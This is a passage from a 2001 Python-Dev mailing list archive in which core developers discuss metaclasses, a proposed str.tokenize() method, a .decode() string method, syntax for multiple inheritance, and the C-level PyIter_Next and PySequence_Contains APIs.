16:25:08 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF1827E.E730F5DE@lemburg.com> Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I think it has to do with terminology: when I say "inherit" > I actually mean "the lookup is forwarded to the another object". Some OO languages munge together the instance and inheritance relationships, but Python isn't one of them. Using terminology that way in the context of Python is guaranteed to cause massive confusion! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Fri May 4 06:58:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:58:20 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz> pf at artcom-gmbh.de (Peter Funk): > * People will confuse this with calling > MyBaseClass.__getitem__(....) Given type/class/instance unification, that's exactly how it'll be implemented. So it's not confusion, it's insightful understanding! > This '::' operator is not at all that ugly Well, that's a matter of opinion. But I'll concede that it's less ugly than something like @ or $. But in any case, it's not going to mean quite the same thing in Python as it does in C++, so it might just confuse C++ people. What exactly *is* it going to mean in Python, anyway? Will it have a corresponding __magic__ method, and if so, what will it be called? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Fri May 4 10:40:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 10:40:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> Message-ID: <3AF26AF1.780462E2@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I think it has to do with terminology: when I say "inherit" > > I actually mean "the lookup is forwarded to the another object". > > Some OO languages munge together the instance and inheritance > relationships, but Python isn't one of them. Using terminology > that way in the context of Python is guaranteed to cause > massive confusion! But that's exactly what I am trying to do here: separate the notion of how lookups work (inheritance) from how objects are created (instantiation) ! In Python instantiation binds the new object to the creating class and all failing lookups are directed from the object to the class. OTOH, the class - base-class lookup relationship doesn't have anything to do creation of objects -- classes are simply bound to their base-classes per definition of the class in the sense that failing lookups are directed to the base-classes. Classes themselves are created by meta-classes. The lookup strategy between the two is defined by the meta-class. What I'm argueing for is that meta-classes should get complete control over how lookups and object creation are done. However, this will only be possible by breaking the current automatic lookup scheme at the meta-class - class boundary since otherwise you'd run into endless loops during lookups (e.g. for many of the __xxx__ methods). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 4 11:04:08 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 11:04:08 +0200 Subject: [Python-Dev] "".tokenize() ? Message-ID: <3AF27088.DE495210@lemburg.com> Gustavo Niemeyer submitted a patch which adds a tokenize like method to strings and Unicode: "one, two and three".tokenize([",", "and"]) -> ["one", " two ", "three"] I like this method -- should I review the code and then check it in ? PS: Haven't gotten any response regarding the .decode() method yet... should I take this as "no objections" ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 11:57:19 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 11:57:19 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff> mal wrote: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1. method bloat. not exactly something you do every day, and when you do, it's a one-liner: def tokenize(string, ignore): [word for word in re.findall("\w+", string) if not word in ignore] > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? -0. method bloat. we don't have asfloat methods on integers and asint methods on strings either... Cheers /F From mal at lemburg.com Fri May 4 12:16:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 12:16:16 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> Message-ID: <3AF28170.399C2A5@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1. method bloat. not exactly something you do every day, and > when you do, it's a one-liner: > > def tokenize(string, ignore): > [word for word in re.findall("\w+", string) if not word in ignore] This is not the same as what .tokenize() does: it cut at each occurrance of a substring rather than words as in your example (although I must say that list comprehension looks cool ;-). > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > -0. method bloat. we don't have asfloat methods on integers and > asint methods on strings either... Well, we already have .encode() which interfaces to PyString_Encode(), but no Python API for getting at PyString_Decode(). This is what .decode() is for. Depending on the codecs you use, these two methods can be very useful, e.g. for "fixing" line-endings or hexifying strings. The codec concept can be used for far more applications than just converting from and to Unicode. About rich method APIs in general: I like having rich method APIs, since they make life easier (you don't have to reinvent the wheel everytime you want a common job to be done). IMHO, too many methods can never hurt, but I'm probably alone with that POV. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 12:50:06 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 12:50:06 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com> Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff> mal wrote: > > > "one, two and three".tokenize([",", "and"]) > > > -> ["one", " two ", "three"] > > > > > > I like this method -- should I review the code and then check it in ? > > > > -1. method bloat. not exactly something you do every day, and > > when you do, it's a one-liner: > > > > def tokenize(string, ignore): > > [word for word in re.findall("\w+", string) if not word in ignore] > > This is not the same as what .tokenize() does: it cut at each > occurrance of a substring rather than words as in your example oh, I didn't see the spaces. splitting on all substrings is even easier (but perhaps a bit more obscure, at least when written on one line): def tokenize(string, seps): return re.split("|".join(map(re.escape, seps)), string) Cheers /F From lkcl at samba-tng.org Fri May 4 13:31:29 2001 From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton) Date: Fri, 4 May 2001 13:31:29 +0200 Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn] Message-ID: <20010504133129.K26116@angua.rince.de> hi there, i thought it best to bring this to someone's attention. the forkingmixin code keeps track of its children, plus because it forks, there's no close_requests() to interfere with the operation of the child etc. etc. now, for some marginally bizarre reason, adding an extra base class - BaseServer - has, i believe (without proof, just a hunch), caused a bug in ThreadingMixIn to be more likely to occur. now, i wrote BaseServer in order to be able to overload this for a server that reads from a SQL server table and performs actions based on what it reads from there (the name of a host and the name of a python script to action on the host, from the database :) :) ... but i don't do threading. python is my first actual exposure to thread programming. does anyone have enough experience with threads to write something in less lines and less time than this message? all best, luke ----- Forwarded message from noreply at sourceforge.net ----- Delivered-To: lkcl at angua.rince.de Delivered-To: lkcl at samba.org To: noreply at sourceforge.net From: noreply at sourceforge.net Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn Date: Thu, 03 May 2001 16:26:12 -0700 Bugs item #417845, was updated on 2001-04-21 08:28 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470 Category: Python Library Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Guido van Rossum (gvanrossum) Summary: Python 2.1: SocketServer.ThreadingMixIn Initial Comment: SocketServer.ThreadingMixIn does not work properly since it tries to close the socket of a request two times. From gward at python.net Fri May 4 20:12:44 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:12:44 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010504141244.A1167@gerg.ca> On 03 May 2001, Paul F. Dubois said: > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): Maybe I'm being thick, but don't you get the same effect by doing this: class X (Y): _sfoo = Y.foo _sbar = Y.bar ...or would the "rename" syntax also hide the "foo" and "bar" names from X's effective namespace[1]? In that case, I guess some special syntax is needed. [1] "effective namespace" -- the union of X's class dict with all its superclass' dicts; not actually X's namespace, but the set of names you can use in X. I think. Err, whatever. Greg From gward at python.net Fri May 4 20:15:51 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:15:51 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200 References: <3AF27088.DE495210@lemburg.com> Message-ID: <20010504141551.B1167@gerg.ca> On 04 May 2001, M.-A. Lemburg said: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? I concur with /F: -1 because you can do it easily with re.split(). Greg -- Greg Ward - Unix bigot gward at python.net http://starship.python.net/~gward/ I hope something GOOD came in the mail today so I have a REASON to live!! From guido at digicool.com Fri May 4 20:36:14 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:36:14 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT." <20010504141244.A1167@gerg.ca> References: <20010504141244.A1167@gerg.ca> Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com> > On 03 May 2001, Paul F. Dubois said: > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > > use Y's version: > > > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): [Greg Ward] > Maybe I'm being thick, but don't you get the same effect by doing this: > > class X (Y): > _sfoo = Y.foo > _sbar = Y.bar > > ...or would the "rename" syntax also hide the "foo" and "bar" names from > X's effective namespace[1]? In that case, I guess some special syntax > is needed. Paul's point is that the rename thing makes it possible to deprecate the form Y.foo, which is causing the basic ambiguity here. > [1] "effective namespace" -- the union of X's class dict with all its > superclass' dicts; not actually X's namespace, but the set of names you > can use in X. I think. Err, whatever. Probably irrelevant. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 4 20:38:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:38:06 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT." <20010504141551.B1167@gerg.ca> References: <3AF27088.DE495210@lemburg.com> <20010504141551.B1167@gerg.ca> Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com> > On 04 May 2001, M.-A. Lemburg said: > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > I concur with /F: -1 because you can do it easily with re.split(). -1 also. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 20:51:26 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 14:51:26 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com> Message-ID: [MAL] > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1 here. Easily enough done via other means, and you just *know* different people will want different variants of tokenization (e.g., nobody in their right mind will want " two " coming back from that example, and, given that it does, that it doesn't also return " three" is baffling). > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? +1 from me: it's the other half of the existing .encode() method, and the current lack of symmetry is icky. From barry at digicool.com Fri May 4 20:57:09 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Fri, 4 May 2001 14:57:09 -0400 Subject: [Python-Dev] Multiple inheritance References: <20010503131714.D21814@inetnebr.com> Message-ID: <15090.64389.746625.331215@anthem.wooz.org> >>>>> "JE" == Jeff Epler writes: >> class X (Y rename foo as _sfoo, bar as _sbar ): | Why not let us spell this as: | class X(Y): | from Y import foo as _sfoo, bar as _sbar | ... >>>>> "NS" == Neil Schemenauer writes: NS> This already has a meaning in Python. Paul's suggested syntax NS> is pretty neat, IMHO. Not if Y is a class though, right? That would currently raise an ImportError, so why not hijack it for this purpose? I think it has a natural and clear enough meaning without requiring additional keywords, or complicating the base class specification syntax. -Barry From tim.one at home.com Fri May 4 22:50:03 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 16:50:03 -0400 Subject: [Python-Dev] Change to PyIter_Next()? Message-ID: In spare moments, I've been plugging away at making various functions work nice with iterators (map, min, max, etc). Over and over this requires writing code of the form: op2 = PyIter_Next(it); if (op2 == NULL) { /* StopIteration is *implied* by a NULL return from * PyIter_Next() if PyErr_Occurred() is false. */ if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else goto Fail; } break; } This is wordy, obscure, and in my experience is needed every time I call PyIter_Next(). So I'd like to hide this in PyIter_Next instead, like so: /* Return next item. * If an error occurs, return NULL and set *error=1. * If the iteration terminated normally, return NULL and set *error=0. * Else return the next object and set *error=0. */ PyObject * PyIter_Next(PyObject *iter, int *error) { PyObject *result; if (!PyIter_Check(iter)) { PyErr_Format(PyExc_TypeError, "'%.100s' object is not an iterator", iter->ob_type->tp_name); *error = 1; return NULL; } result = (*iter->ob_type->tp_iternext)(iter); *error = 0; if (result) return result; if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else *error = 1; } /* Else StopIteration is implicit, and there is no error. */ return NULL; } Then *calls* could be the simpler: op2 = PyIter_Next(it, &error); if (op2 == NULL) { if {error) goto Fail; break; } Objections? So far I'm almost the only user of PyIter_Next(); the only other use is in ceval's FOR_ITER, which goes thru a similar dance. However, I'm not clear on why FOR_ITER doesn't clear the exception if PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both true -- that sure smells like a bug (but, if so, the change above would squash it by magic). Note that I'm not proposing to change the signature of the tp_iternext slot similarly. PyIter_Next() is a (IMO appropriately) higher-level function. From guido at digicool.com Sat May 5 00:03:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 17:03:36 -0500 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400." References: Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> > In spare moments, I've been plugging away at making various functions work > nice with iterators (map, min, max, etc). For which efforts I extend my greatest thanks! > Over and over this requires writing code of the form: > [etc.] > > This is wordy, obscure, and in my experience is needed every time I call > PyIter_Next(). > > So I'd like to hide this in PyIter_Next instead, like so: > > /* Return next item. > * If an error occurs, return NULL and set *error=1. > * If the iteration terminated normally, return NULL and set *error=0. > * Else return the next object and set *error=0. > */ > PyObject * > PyIter_Next(PyObject *iter, int *error) > { [etc.] > } > Then *calls* could be the simpler: > > op2 = PyIter_Next(it, &error); > if (op2 == NULL) { > if {error) > goto Fail; > break; > } I originally had this API for tp_iternext, and changed it to the current API because I got tired of having to declare the error variable. How about making PyIter_Next() call PyErr_Clear() when the exception is StopIteration? Then calls could be op2 = PyIter_Next(it); if (op2 == NULL) { if (PyErr_Occurred()) goto Fail; break; } This is a tad slower and arguably generates more code (assuming an extra call is slower than passing an extra argument and loading it) but doesn't require declaring the error variable. But since you're the customer, it's your choice. > Objections? So far I'm almost the only user of PyIter_Next(); the only other > use is in ceval's FOR_ITER, which goes thru a similar dance. > > However, I'm not clear on why FOR_ITER doesn't clear the exception if > PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both > true -- that sure smells like a bug (but, if so, the change above would > squash it by magic). Smells like a bug indeed. > Note that I'm not proposing to change the signature of the tp_iternext slot > similarly. PyIter_Next() is a (IMO appropriately) higher-level function. Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 23:18:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 17:18:16 -0400 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> Message-ID: [Tim] >> In spare moments, I've been plugging away at ... iterators [Guido] > For which efforts I extend my greatest thanks! Yet but a pale reflection of the thanks I extend to you for implementing these guys to begin with: they're *loads* of fun! But not nearly as much fun as playing with Perl, so they're still prudently Pythonic . [T proposed adding a int* error arg to PyIter_Next()] [G] > How about making PyIter_Next() call PyErr_Clear() when the exception > is StopIteration? > > Then calls could be > > op2 = PyIter_Next(it); > if (op2 == NULL) { > if (PyErr_Occurred()) > goto Fail; > break; > } Perfect. I'll do that later tonight, and update the PEP to match. > This is a tad slower and arguably generates more code (assuming an > extra call is slower than passing an extra argument and loading it) > but doesn't require declaring the error variable. Well, it's two more calls (since PyErr_Occurred() also makes a call to get the thread state), but I don't really care because the client only does this in case of error or end-of-iteration (which aren't the normal cases). I was dreading finding a spare int var to pass inside FOR_ITER anyway . From paulp at ActiveState.com Sat May 5 02:03:05 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Fri, 04 May 2001 17:03:05 -0700 Subject: [Python-Dev] :: Message-ID: <3AF34339.9C553704@ActiveState.com> I'll throw out a partially formed thought in case it is useful to anybody. "::" might be useful to solve another problem I've been struggling with: how to have multiple package distributions share a namespace (xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). "::" might mean, in general, that you are walking through abstract, potentially merged namespaces and not through concrete dictionary implementations. I think that Python's using the same syntax for package namespaces and attribute accesses might seem more elegant than it is in practice. Things that "seem like" they should work do not because packages are fundamentally different than attributes: >>> from xml import dom.minidom File "", line 1 from xml import dom.minidom ^ SyntaxError: invalid syntax Why isn't this symmetric? I would like to use "." on either side of the import >>> import xml >>> print xml.dom Traceback (most recent call last): File "", line 1, in ? AttributeError: 'xml' module has no attribute 'dom' >>> from xml.dom import minidom >>> print xml.dom I find it a little bit weird that importing one module has the side effect of populating a package. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido at digicool.com Sat May 5 05:07:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 22:07:56 -0500 Subject: [Python-Dev] :: In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST." <3AF34339.9C553704@ActiveState.com> References: <3AF34339.9C553704@ActiveState.com> Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com> > I find it a little bit weird that importing one module has the side > effect of populating a package. That's just because you've seen too much Java. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sat May 5 10:13:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 05 May 2001 10:13:30 +0200 Subject: [Python-Dev] "".tokenize() ? References: Message-ID: <3AF3B62A.50DD4115@lemburg.com> Tim Peters wrote: > > [MAL] > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1 here. Easily enough done via other means, and you just *know* different > people will want different variants of tokenization (e.g., nobody in their > right mind will want " two " coming back from that example, and, given that > it does, that it doesn't also return " three" is baffling). Ok. I rejected the patch with a mild response to take on this by subclassing strings in Python 2.2 ;-) > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > +1 from me: it's the other half of the existing .encode() method, and the > current lack of symmetry is icky. Right. If I here no strong objections, I'll check in the .decode() method next week. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Sat May 5 13:45:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 06:45:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200." <3AF0662D.48671B4E@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com> > I've attached the patch. Due to a small reorganisation the > patch is a little longer -- symmetry has its price at C level > too ;-) Looks good on paper, so go ahead and check it in. Watch out for potential changes caused by Tim's iter-crusade! :-) While you're at it, why don't you check in the rot13 codec you posted -- it's good to have simle examples in the standard library. It would also be cool to have codecs for common file encodings like base64, quoted-printable, binhex, uuencode, and even hex (binascii.hexlify). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:15:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:15:52 -0500 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200." <3AF3B62A.50DD4115@lemburg.com> References: <3AF3B62A.50DD4115@lemburg.com> Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com> > Ok. I rejected the patch with a mild response to take on this by > subclassing strings in Python 2.2 ;-) Gustavo didn't take the rejection well. He contacted me asking for a better explanation, and we got into a bit of an argument about how much I must explain my decisions, but I think hge understands now. > If I here no strong objections, I'll check in the .decode() > method next week. Yes, see my previous reply. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:24:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:24:19 -0500 Subject: [Python-Dev] PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST." References: Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> In a checkin message, Tim wrote: > The full story for instance objects is pretty much unexplainable, because > instance_contains() tries its own flavor of iteration-based containment > testing first, and PySequence_Contains doesn't get a chance at it unless > instance_contains() blows up. A consequence is that > some_complex_number in some_instance > dies with a TypeError unless some_instance.__class__ defines __iter__ but > does not define __getitem__. This kind of thing happens everywhere -- instances always define all slots but using the slots sometimes fails when the corresponding __foo__ doesn't exist. Decisions based on the presence or absence of a slot are therefore in general not reliable; the only exception is the decision to *call* the slot or not. The correct solution is not to catch AttributeError and pretend that the slot didn't exist (which would mask an AttributeError occurring inside the __contains__ method if there was one), but to reimplement the default behavior in the instance slot implementation. In this case, that means that PySequence_Contains() can be simplified (no need to test for AttributeError), and instance_contains() should fall back to a loop over iter(self) rather than trying to use instance_item(). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 22:40:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 16:40:11 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > This kind of thing happens everywhere -- instances always define all > slots but using the slots sometimes fails when the corresponding > __foo__ doesn't exist. Decisions based on the presence or absence of > a slot are therefore in general not reliable; the only exception is > the decision to *call* the slot or not. The correct solution is not > to catch AttributeError and pretend that the slot didn't exist (which > would mask an AttributeError occurring inside the __contains__ method > if there was one), Ya, it sucks. I was inspired by that instance_contains() itself makes dubious assumptions about what an AttributeError means when the functions *it* calls raise it . > but to reimplement the default behavior in the instance slot > implementation. The "backward compatibility" comment in instance_contains() was scary: compatibility with *what*? instance_contains() is pretty darn new. I assumed it meant there was *some* good (but unidentified) reason we had to use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if instance_item() "worked". But I haven't thought of one, except to ensure that some_complex in some_instance_with___getitem__ continues to blow up -- but that's not a good reason. So: > In this case, that means that PySequence_Contains() can be simplified > (no need to test for AttributeError), and instance_contains() should > fall back to a loop over iter(self) rather than trying to use > instance_item(). Will do! From guido at digicool.com Sat May 5 23:48:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 16:48:33 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400." References: Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> > [Guido] > > This kind of thing happens everywhere -- instances always define all > > slots but using the slots sometimes fails when the corresponding > > __foo__ doesn't exist. Decisions based on the presence or absence of > > a slot are therefore in general not reliable; the only exception is > > the decision to *call* the slot or not. The correct solution is not > > to catch AttributeError and pretend that the slot didn't exist (which > > would mask an AttributeError occurring inside the __contains__ method > > if there was one), [Tim] > Ya, it sucks. I was inspired by that instance_contains() itself makes > dubious assumptions about what an AttributeError means when the functions > *it* calls raise it . Actually, instance_contains checks for AttributeError only after calling instance_getattr(), whose only purpose is to return the requested attribute or raise AttributeError, so here it is safe: the __contains__ function hasn't been called yet. > > but to reimplement the default behavior in the instance slot > > implementation. > > The "backward compatibility" comment in instance_contains() was scary: > compatibility with *what*? With previous behavior of 'x in instance'. Before we had __contains__, 'x in y' *always* iterated over the items of y as a sequence, comparing them to x one at a time. The loop does that. > instance_contains() is pretty darn new. I > assumed it meant there was *some* good (but unidentified) reason we had to > use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if > instance_item() "worked". No, that was probably just an oversight -- clearly it should have used rich comparisons. (I guess this is a disadvantage of the approach I'm recommending here: if the default behavior changes, the reimplementation of the default behavior in the class must be changed too.) > But I haven't thought of one, except to ensure > that > > some_complex in some_instance_with___getitem__ > > continues to blow up -- but that's not a good reason. Indeed not. > So: > > > In this case, that means that PySequence_Contains() can be simplified > > (no need to test for AttributeError), and instance_contains() should > > fall back to a loop over iter(self) rather than trying to use > > instance_item(). > > Will do! Thanks! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:24:58 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:24:58 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Actually, instance_contains checks for AttributeError only after > calling instance_getattr(), whose only purpose is to return the > requested attribute or raise AttributeError, so here it is safe: the > __contains__ function hasn't been called yet. I'd say "safer", but not "safe": at that point we only know that *some* attribute didn't exist, somewhere, while attempting to look up "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ hook, like def __getattr__(self, attr): return global_resolver.resolve(self, attr) where global_resolver has lost its "resolve" attr. "except" clauses aren't more bulletproof in C than in Python <0.9 wink>. > With previous behavior of 'x in instance'. Before we had > __contains__, 'x in y' *always* iterated over the items of y as a > sequence, comparing them to x one at a time. I don't believe I ever knew that! Thanks. I erronesouly assumed that the looping behavior was *introduced* when __contains__ was added. > ... > No, that was probably just an oversight -- clearly it should have used > rich comparisons. (I guess this is a disadvantage of the approach I'm > recommending here: if the default behavior changes, the > reimplementation of the default behavior in the class must be changed > too.) I factored out the new iterator-based __contains__ logic into a new private API function, called when appropriate by both PySequence_Contains() and instance_contains(). So any future changes to what iterator-based __contains__ means will only need to be made in one place. too-easy-ly y'rs - tim From guido at digicool.com Sun May 6 00:31:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 17:31:05 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400." References: Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> > [Guido] > > Actually, instance_contains checks for AttributeError only after > > calling instance_getattr(), whose only purpose is to return the > > requested attribute or raise AttributeError, so here it is safe: the > > __contains__ function hasn't been called yet. [Tim] > I'd say "safer", but not "safe": at that point we only know that *some* > attribute didn't exist, somewhere, while attempting to look up > "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ > hook, like > > def __getattr__(self, attr): > return global_resolver.resolve(self, attr) > > where global_resolver has lost its "resolve" attr. "except" clauses aren't > more bulletproof in C than in Python <0.9 wink>. Yes, but attribute errors inside __getattr__ hooks are *always* a problem to debug, since raising AttributeError is part of its job. So this is not new. I should have said "as safe as it gets." > > With previous behavior of 'x in instance'. Before we had > > __contains__, 'x in y' *always* iterated over the items of y as a > > sequence, comparing them to x one at a time. > > I don't believe I ever knew that! Thanks. I erronesouly assumed that the > looping behavior was *introduced* when __contains__ was added. Surely you knew that "x in y" looped over the items of y? What else could it have done? It was only defined on sequences! > > ... > > No, that was probably just an oversight -- clearly it should have used > > rich comparisons. (I guess this is a disadvantage of the approach I'm > > recommending here: if the default behavior changes, the > > reimplementation of the default behavior in the class must be changed > > too.) > > I factored out the new iterator-based __contains__ logic into a new private > API function, called when appropriate by both PySequence_Contains() and > instance_contains(). So any future changes to what iterator-based > __contains__ means will only need to be made in one place. Cool. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:53:51 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 